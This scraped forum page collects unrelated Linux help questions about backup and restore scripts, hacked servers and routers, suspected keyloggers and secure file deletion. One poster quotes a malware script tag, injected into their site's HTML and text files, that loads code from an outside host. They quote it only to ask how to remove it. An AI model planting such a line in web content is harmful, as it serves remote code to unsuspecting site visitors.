I've discovered that after restoring my site's backup this has happened to me again. How to delete the hacked /home/crocbits directory so that I can restore the backup under the same username. When I try to delete /home/crocbits I get this message when logged in as root:
[Code]...
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
View 6 Replies View RelatedI install and tested Restore EE Backup server on a test PC with basic configuration and its working fine.
[URL]
The issue i have is where is the location these backup snapshots or files are saving? I want to add a separate Storage to save the backup?
I have carefully made daily backups using rdiff-backup, so in the case of needing to restore I can do so.
But I deleted a directory yesterday, and made a backup in the evening. Therefore, the directory is not in the latest mirror, but in the incremental backup from yesterday.
Now I need to restore the directory. But I cannot figure out how to!
I can see the directory in yesterday's incremental backup; i.e., the following works:
Code:
Where [backupdir] is the backup (mirror) directory, and [nameofdir] is the name of the directory I'm trying to restore.
So, I have tried to restore. This is the type of thing I have tried:
Code:
Where to-restore.lst holds the name of the directory to restore (in rdiff-backup's format) and [restoredir]is where I want the restored directory to go to.
But, I get errors like:
Code:
Useful file specifications begin with the base directory or some pattern (such as '**') which matches the base directory. Well, obviously the file specification doesn't exist in the [restoredir]. That's because I'm trying to restore it! If I try to create an empty directory first, it complains:
Code:
How do I restore a deleted directory from a previous day's backup to a designated destination?
i am new to linux and i nid a bash script to Delete selected backup files and also restore selected backup file to a user define directory.
View 3 Replies View RelatedIs it possible to backup and restore the system files of fedora 10_x86_64 so that if there will be any problem at OS , I can easily recover it from the previous backup files?
View 1 Replies View RelatedI would like to create a bash menu script for my home server For instance if i were to type ./script It would then bring up 3 options
a. Create a backup
b. Restore files from a backup
c. Quit
If you were to select a or b it should then ask you were you want to backup or restore from. And if i were to type in an incorrect letter i should get an error and take me back to menu. I have attepmted this a view time now and have magaged to get the menu up using parameters
I have a shell script that need to create some files:
1) backup files of user passed in file ( that will be written by this shell ).
2) temp files that the shell will create and later delete/remove.
This shell script will be used from my local dir ( I am not a super or a sysadmin ). Users of this shell will call this script to run on their local files in their respective directories. When my script runs, it errors with the following:
cp: cannot create regular file `./listfile.txt.backup': Permission denied
/home/myUser/tools/myShellScript: line 12: listfile.txt: Permission denied
for the temp I was able to avoid this error by creating the temp file in the /tmp directory. All I want is for this shell script to run, create/modify/backup files in user's local dirs.
The user dir has the following permission:
drwxr-xr-x testDir
the file that needs to be backed-up has:
-rw-r--r-- listfile.txt.
Maybe a site-to-site Ouija board connection.
View 5 Replies View RelatedI am now preparing myself to upgrade lenny to squeeze and decided to do a backup on my system. I used backup-manager to do the job and it worked fine. how do you restore said backup data?
View 4 Replies View Relatedi am in need of linux help. iam at college and i need this back/restore script to pass this final part of an assessment. i require a backup script that will not only backup but also restore files to the relevent directories. e.g. users are instructed to store all wordprocessor files in a directory named wp. so i am needing to create a backup directory and 3 directories within that and some files within the 3 directories and then back them up ot restore them. l know i should/have to do this myself by been trying to get/understand info for the last few days and came up with zero.
View 14 Replies View RelatedI want to know if any one hacked or getting into my computer. I am using lucidlynx right now, My computer directly connected to modem, not using any wireless router. How can i check if some one hacked? How to prevent it?
View 6 Replies View RelatedI have a 6yo laptop...z60m. Solid little thing that I knocked around so much the hinge broke. My dad jerryrigged it so it can stay open.
So now I use it as a glorified DVD player. Then, around February the hard drive died. I put it in fresh, loaded a couple of regular games and the DVD modifications to play DVD's. So, besides the basic upgrade to 9.1 not much as been done.
Well, last week my panel disappeared. I procrastinated and last night I got on the computer. I did F2 and "xfce-panel" and my panel reappeared exactly how I'd last tweaked it.
With on exception. This blue globe, "Akonadi" had mysteriously appeared.
Thing is that I haven't installed or updated anything for 8 months...why? becuase I haven't had this thing connected to the Internet. The wireless tower has been on. (my bad) but all of the signigals in my neck of the wood are encripted so I just let it be.
I don't know where this program came from. Is it loaded in xubuntu? Why would it show up? And furthermore if there was someone with malicious intent (unfortunatly I do have to take that into consideration) have put this on for data collection?
I have windows computer and it is being hacked.About month ago or more some one hacked my router and install new firmware from Firmware Version: Talisman/Basic V1.2.9a
My router is linksys and SSID got changed to sveasoft.I had WPA set up and MAC filtering .
Some one hacked my router and change Firmware Version.And user name and password also got change to just admin.
Well now I got a pop up from my Kaspersky saying network attack scan.generic.TCP 74.63.245.168
only thing I can find on it http://whatismyipaddress.com/ip/74.63.245.168
It is Limestone Networks in Dallas.
Some strang things have been happing to my computer in past 4 months and is getting worse.
I have no firewall or router now.And have not gone to the store and get new router yet and I'm thinking of formatting my computer and putting linux and get good firewall like zone-alarm.
Awoke to millions of failed SSH attempts into my public server. Behind a firewall which forwards only SSH and HTTP. Local iptables deny everything except SSH and HTTP. Exact same symptoms and results as Chris over at his site: here.I just want to know how they managed to execute a script, or make changes etc? Here's some info:According to cat /var/log/secure | grep "Accepted" no one besides myself gained entry via SSH.The FTP account (500:48 (Purposely in apache group)) is chrooted to a 775 directory and vsftpd does not accept anonymous entry. vsftpd and xferlog's are empty?
Code:
You have new mail in /var/spool/mail/root
[root@dev etc]# tail /var/spool/mail/root
[code]....
I had a serious breach of the cellular segment of my communications network this week. All I can say is nobody got hurt. The attackers also knew where to find me via email. I'm concerned that perhaps they've penetrated this aspect of my system as well, although they seemed pretty specifically focused on the phone. There have been no changes on anything on my computer, and of course, I went ahead and changed all the passwords. How can I verify or at least look into the possibility of having been hacked as well.
View 8 Replies View Relatedmy computer has been surely hacked for at least more than two months; my private information are being hacked and spread around! I initally used Windows Vista and I had the firewall off and no antivirus software. When I realized that my OS had been hacked, I began turning my firewall on and installing security softwares, but nothing stopped the hack.
Yesterday, I erased all my partitions and installed Ubuntu 10.10. I installed rkhunter and a firewall. I changed my static IP adress, at least for the sake of knowledge, to another one, then I got disconnected since my router only allows my old IP.
When I'm about to write my admin password, I disconnect from the network. I've scanned my system using rkhunter, and the result is a list of 30 suspicious files!
Can I adjust my router in a way that it can allow any IP adress? If yes, can I have a non-static IP adress? How to prevent the hacking in the first place? However, I believe, I don't know yet, that my Ubuntu has also been hacked...
If I can't get rid of the hacker(s), then I should permanently disconnect from internet and find another way to receive information anonymously through the internet.
I have LAN with 20 machines. I see that one of them is infected. Its sending a lot of packets to the internet. My internet connection at this momment is realy slow. What should I do? How to detect which machine is infected? I'm using hardware firewall. Fortigate... Its hard to configure there nice logs. Any good software. I don't want to switch off network cable from each machine and check.
View 10 Replies View RelatedI always use professional services to secure my servers. Everything was fine for years but a week ago my server got hacked.I don't know how the hacker got my username/password - it was not something like admin, password.9 months ago my PC was infected with some virus which connected to the FTP server by using password which was saved in CuteFTP and infected all index files with some javascript. Then I changed the user/FTP password and didn't save it anymore in Cute FTP. Of course, I checked all the folders and re-uploaded all infected files. Is it possible that this virus uploaded some hidden file which was able to get the new password for this account?
The server was hacked from so called Tor IP address. I am tiref of worrying about server security and now have an idea to get a static IP address from my ISP and to allow logins only from this IP address. What do you think about it? This idea looks good for me but are there any risks to lose access to the server. Can ISP provider change the static IP address for some reason?
I have read in some book that syslogd keeps lots of logs that with the time consume a considerably part of your hard drive. I know this is very nice feature and all that, but sometimes privacy in this competitive world is a matter fact. Here goes the questions: Is it possible to 'auto delete' the syslogd files automatically? May the destruction of the logs make some hangs on my system? May some program need the daemon to function properly?
View 1 Replies View RelatedI m going to create a backup script for my files/folders...
This script creates tar.gz of the folders/files you want.
This i want is to encrypt these .tar.gz files and when i need them to decrypt them. Does anyone have an idea on how to encrypt these files ?
my script looks like this :
Code:
BACKUPDATE=$(date +%d%m%Y)
cd /home/n3t
echo "taking Backup of your home/n3t/Downloads dir"
tar -czvf /media/disk/BACKUP/home/Downloads/$BACKUPDATE.tar.gz ./Downloads
A scan on my computer reported as up many local ips which simply does not exist in my network. This host is supposed to have ip 192.168.0.4, but all other ip should not be there. I have a USB modem connected to a Linux box, connected itselfs to a wifi linksys router and thats it.
# nmap -sP '192.168.*.*' | grep -v down
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2010-11-18 21:46 CET
Host 192.168.0.4 appears to be up.
Host 192.168.7.27 appears to be up.
Host 192.168.10.0 appears to be up.
[Code]...
I have some very confidental files on my computer that I store such as credit reports, and other things. I always encrypt them with GPG, but there still is that original non-encrypted file left that needs to be deleted. I looked into tools like wipe, and shred but they all say that it really doesn't help on journaling filesystems directly on their man page.
I am not asking how to wipe the whole drive with dd or anything, but I am simply asking if there is a tool that'll delete a single file securely.
I don't use the Trash bin because it does not really delete things,speaking from a security point Instead, I gotten used to 'shred' and 'secure-delete' .But to move around files, cut-n-paste is very handy.And I was wandering if items from the Clip get stored somewhere ?i realize that they get overwritten again and again in the clipboard but do they also get stored somewhere else?
View 9 Replies View RelatedI hope that I'm posting this thread in the right place. This involves a very unique problem which has caused the .Trash-1000 folder for my external USB drive to become corrupted, to the point of causing massive heat problems which then causes my system to crash, i.e. become completely inoperable, forcing me to do a hard reset.
The scenario: Recently I went through all of my backup data which is what I use that external USB drive for. After finding several GB of data files, some dating back 2 - 3 years from a root server that I used to have, I went ahead and tried to delete all of those files. Well, with exception to 3 folders, containing no more than perhaps 35 files which totalled less than 8 MB in space, everything was deleted properly without a hitch. The files that couldn't be deleted prompted some strange "couldn't delete blahblahblah file due to input/output error" message. One message for each file that couldn't be deleted.
Now mind you, I can open these files, look at them, rename them, copy them, but I cannot delete them. Still being pretty wet as far as Linux is concerned, I tried numerous suggestions that I could find on the internet, all of which had to do with file permissions in one form or another. I've tried everything that made any sense and still can't delete those files.
All of the data is my own, all of the hardware is mine, and I'm the only one using this machine. I'm not attempting to do anything illegal. Then I figured, smart as I am, why don't I just assign ownership of the .Trash folder to myself via the chown -R command, followed by deleting the files afterwards. Okay, the chown command gave me no error, I assumed all was well since it's my USB drive to begin with and since it automounts during every restart anyway. I just figured that this would be something to try. BIG MISTAKE !!!
My system runs just as perfectly as before, with but one exception. NOW, when I attempt to delete those files that I couldn't delete before, I don't get an error message anymore but the CPU starts hyperventilating during the deletion process which goes on endlessly (remember, we're taking about less than 8 MB of data) ... ultimately causing the system to crash, i.e. become totally unresponsive. NOW, if I delete additional files from that USB drive and then attempt to empty the trash, the newly deleted files take substantially longer too now. Not as long as the original "bad files" but still quite long. The drive itself checks out fine and it's not a dual-boot system with Windows. Just did a virus check recently too and everything checks out in that regard as well.
Can someone tell me how to reassign whatever original values there were for that external drive .Trash folder? I think if I could restore those values to whatever they used to be before I used the chown -R command, perhaps then everything would be fine again as far as the crashing is concerned. HELP ....
(Please take a look at the screenshots too)
The last screenshots shows "preparing to delete" which takes a very long time. Then it takes anywhere from 15 to 45 seconds PER FILE before that miniscule file is actually supposedly deleted. Eventually, after a few files are deleted, the system crashes. I wrote "supposedly deleted" because after a reboot the files are still there .
I need to know whether Ubuntu can be hacked when it is installed as a dual boot with W7 by hacking windows and getting access to the Ubuntu partition?
What I would also like to know if this way can be used to put a key logger or screen capture in Ubuntu which installs next time Ubuntu is started?
I believe it is a keylogger because my Facebook account has been hacked, I believe my email has as well. I heard that even if you reformat a harddrive, the virus could still sit there and apparently that is what happened to me. how to be rid of it and keep my security. I installed RKhunter and Chkrootkit. Rkhunter reports warning files while checking my filesystem. I can post a log if need be.
View 9 Replies View RelatedMy server (Ubuntu 10.04 desktop) was hacked. I had my ethernet plugged in to an Intel 82557 Ethernet Pro card (Pulse) when my server was first attacked. After it was attacked I reinstalled the system but my ethernet card still would not work. Ubuntu recognized it, but it is continually disconnected and the little status lights on the card do not light up anymore.
So then I plugged the ethernet to the mother board itself. Well, my server was hacked again and now the ethernet on the motherboard does not work. Again, Ubuntu (after a reinstall) recognizes the hardware but nothing happens when I plug the etherent in. The motherboard is a BioStar P4M900 VIA chipset. I have a few of the system logs here [URL] which I saved right after the first attack.
I just got control over a server that was hacked several months back. The other day we started receiving rejected emails sent from my server to a yahoo email address that is no longer active that contained users login information. I am trying to find the process that is sending these emails. So far its been like finding a needle in a haystack. The email that is being sent is appending the login information each time it is sent so there must be a local file that contains this information. I have tried using grep and find without any luck.
View 2 Replies View RelatedI'm trying to clean a hard drive and I'm using secure-delete but it just stands there and takes cpu power but nothing happens, I used -r switch first and nothing, so I tried it on single files, small pictures worked as intended but a simple 50MB MPG file just stands there as well and nothing happens.
I left it running for 24 hours and nothing happened but the cpu was working at 90-100% all the time :/
Any one know what's wrong? I'm using 10.04 UNR